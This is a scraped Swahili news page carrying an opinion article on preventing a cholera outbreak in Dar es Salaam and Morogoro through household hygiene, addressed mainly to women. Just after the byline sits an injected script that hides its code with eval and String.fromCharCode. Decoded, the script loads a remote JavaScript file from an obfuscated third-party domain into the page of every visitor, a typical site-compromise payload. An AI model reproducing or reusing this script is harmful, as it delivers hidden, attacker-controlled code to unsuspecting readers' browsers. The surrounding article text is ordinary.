Recent Comments

JARIDA LA WANAWAKE: Tukatae kipindupindu majumbani mwetu

By Baraka Bitariho Aug 29, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

theo_210_120
UGONJWA wa kipindupindu umeibuka kwa mara nyingine mkoani Dar es Salaam katika wilaya ya Kinondoni na baadaye kuenea mpaka katika mkoa wa Morogoro. Kwa takwimu inaelezwa kuwa watu watatu wameshafariki dunia mkoani Dar es Salaam na waliougua mpaka sasa wako 56 na kati ya hao, watu hao 36 wako hospitalini wakipata matibabu.

Katika mkoa wa Morogoro, kuna kifo cha mtu mmoja huku watu nane wakiugua ugonjwa huo. Inaelezwa kuwa kiini kikubwa cha ugonjwa huo ni uchafu au kula vyakula vyenye uchafu, hivyo kila mmoja ametakiwa kuacha ulaji wa vitu ovyo ili kuepuka ugonjwa huo.

Kwa kuwa wanawake ndiyo wenye majukumu ya kuhakikisha vyakula na maeneo yote ya nyumbani yanakuwa safi, ni vyema tuhakikishe tunakuwa wasafi zaidi ya ilivyozoeleka. Tunapaswa kusafisha mitaro yote karibu na nyumba na wale wanaotafuta riziki kwa kupika vyakula, ni vyema waache kufanya vitu kwa mazoea, ili wahakikishe vinatayarishwa katika hali ya usafi.

Pia ni vyema kuweka mazingira yatakayohakikisha watu wanakula vyakula vya moto ili kuepuka ugonjwa huo kuenea zaidi, iwe kwenye familia au kwenye biashara ya vyakula. Mbali na hivyo ni vyema akinamama kuhakikisha nyumbani au sehemu za vyakula, kumewekwa mazingira mazuri ya kunawa mikono kabla ya kula au mtu akitoka maliwatoni ahakikishe amesafisha mikono yake.

Hakika kuendelea kuenea kwa ugonjwa huo na kuingia nyumbani kwa mwanamke, ni aibu kwani kila mtu atafahamu kuwa hali hiyo imetokana na uchafu uliopo kwenye familia na mtu wa kwanza kulaumiwa ni mama.

Japokuwa wanaume wanahusika kwa kiasi fulani kuhakikisha usafi unakuwepo nyumbani, lakini kwa mila za kiafrika mama ni msimamizi mkubwa wa masuala ya usafi nyumbani, kwa watoto na mazingira ya nyumbani.

Hivyo kwa kuzingatia hilo, ni vyema tutoe pia elimu kwa watoto katika kuzingatia usafiri, ikiwa ni pamoja na kuacha ulaji wa ovyo kwa vyakula wanapokuwa shuleni na njiani. Hakika ni aibu kubwa familia kupata ugonjwa huo kutokana na uchafu wa ndani ya nyumba, hivyo ni lazima kujipanga kuhakikisha hauenei katika nyumba zetu na ikitokea mtu ameugua iwe kwa bahati mbaya tu.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com